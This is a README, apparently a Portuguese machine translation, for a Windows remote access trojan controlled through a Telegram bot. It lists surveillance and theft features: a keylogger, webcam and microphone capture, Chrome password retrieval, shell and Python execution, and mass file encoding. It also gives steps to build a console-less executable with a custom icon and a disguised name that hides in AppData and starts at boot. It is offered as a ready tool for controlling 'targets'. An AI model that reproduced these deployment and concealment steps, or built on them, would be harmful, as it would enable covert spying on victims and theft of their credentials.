RAT-via-Telegram
Ferramenta de Administração Remota do Windows via Telegrama (agora no Python 3.7!) | Originalmente criado por Ritiek
Por que outro?
- As ferramentas de administração remota atuais no mercado enfrentam dois grandes problemas:
- Falta de criptografia.
- Exigir o encaminhamento de portas para controlar centenas de quilômetros.
- Esse RAT supera esses dois problemas usando a API do bot Telegram.
- Totalmente criptografado. Os dados que estão sendo trocados não podem ser espiados usando ferramentas MITM.
- Telegram messenger app fornece uma maneira simples de se comunicar com o alvo sem configurar a porta para a frente antes da mão no alvo.
Características:
- Keylogger com log de título da janela incluído
- Obtenha a versão, o processador e mais do Windows do PC alvo
- Obter informações de endereço IP do PC alvo e localização aproximada no mapa
- Excluir, mover arquivos
- Mostrar diretório atual
- Alterar o diretório atual
- Listar diretório atual ou especificado
- Faça o download de qualquer arquivo do destino
- Carregar arquivos locais para o destino. Envie sua imagem, pdf, exe ou qualquer coisa para o bot Telegram
file - Autostart a reprodução de um vídeo em tela cheia e sem controles para um vídeo do youtube no alvo
- Tome Screenshots
- Execute qualquer arquivo
- Acesso ao microfone
- Iniciar servidor proxy HTTP
- Congelar o teclado do alvo
- Programar tarefas para serem executadas na data e hora especificadas
- Codificar / Decodificar todos os arquivos locais
- Alvos de ping
- Atualização .exe – obrigado LearnerZone
- Auto-Destruct RAT
- Alterar papel de parede do arquivo ou url
- Executar shell cmd
- Tire fotos da webcam (se anexadas)
- Execute python arbitrário 3.7 em movimento
- Congelar o mouse do alvo
- [TODO] Browser (IE, Firefox,
cromada) recuperação de cookies - [TODO] Password retrieval
- [TODO] Monitor web traffic (graphically?)
- [TODO] Monitoramento de banda larga (trampolim para monitoramento de tráfego na web) – iniciado em 28/10/2018
- [TODO] Ajuste fino de script (ou seja, se o aplicativo x for aberto, y será executado)
- [TODO] Capture clipboard (Text, Image)
- [TODO] Hide desktop icons
- [TODO] Audio compression
- [TODO] Pesquisa de servidor de nomes (/ nslookup – # 19 )
Obrigado Dviros :
- Login do Chrome / recuperação de senha
- Exibir tabela ARP
- Obtenha processos e serviços ativos
- Desligamento / reinicialização do computador
- Exibir cache DNS
& Mais em breve!
Screenshots:
Instalação e uso:
- Clone este repositório.
- Configure um novo bot Telegram conversando com o .
BotFather - Copie esse token e substitua-o no início do script.
- Instale as dependências: .
pip install -r requirements.txt - Instale PyHook e PyAudio ou, dependendo do seu sistema, de lfd.uci.edu
64-bit32-bit - Para executar o script: .
python RATAttack.py - Encontre seu bot no telegrama e envie algum comando ao bot para testá-lo.
- Para restringir o bot de modo que ele responda apenas a você, anote o seu no console e substitua-o no script e comente a linha . Não se preocupe, você saberá quando ler os comentários no script.
chat_idreturn True
– Uma pasta chamada `RATAttack` será criada em seu diretório de trabalho contendo` keylogs.txt` e quaisquer arquivos que você enviar para o bot.
Implante rapidamente:
- Clone o repo
- Crie um bot com e salve o token
BotFather - Entre e substitua pelo token que você salvou
RATAttack.pytoken - Corre
setup_rat.py
Comandos:
Ao usar os comandos abaixo; use como um prefixo. Por exemplo: . / /pc_info
arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by it's name
update - update executable
wallpaper - change wallpaper
Você pode copiar as informações acima para atualizar sua lista de comandos, para não precisar digitá-las manualmente. BotFather
Compilando:
Como compilar:
Ou:
Replace your path in compileAndRun.bat (running this will actually run the executable)
Ou:
Run `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. You can also pass `--icon=<path\to\icon.ico>` to use any custom icon.
- Uma vez que é compilado com sucesso, encontre o arquivo em . Você pode mudar o nome do para qualquer coisa que você deseja.
.exeC:\Python37\Scripts\dist\.exe - CUIDADO! Se você executar o compilado , o script se moverá para a inicialização e iniciará com o seu PC para ser executado na inicialização. Você pode voltar ao normal usando a opção ou removendo manualmente o diretório e (embora eu recomende removê-los manualmente por enquanto).
.exe/self_destructC:\Users\Username\AppData\Roaming\PortalC:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk
Modificando Configurações:
- Você também pode modificar o nome do arquivo oculto e localização e nome da pasta onde o oculto irá se esconder. Para fazer isso; modificar e respectivamente.
.exe.execompiled_namehide_folder - Atribuir seus IDs de bate-papo conhecidos ao início de RATAttack.py
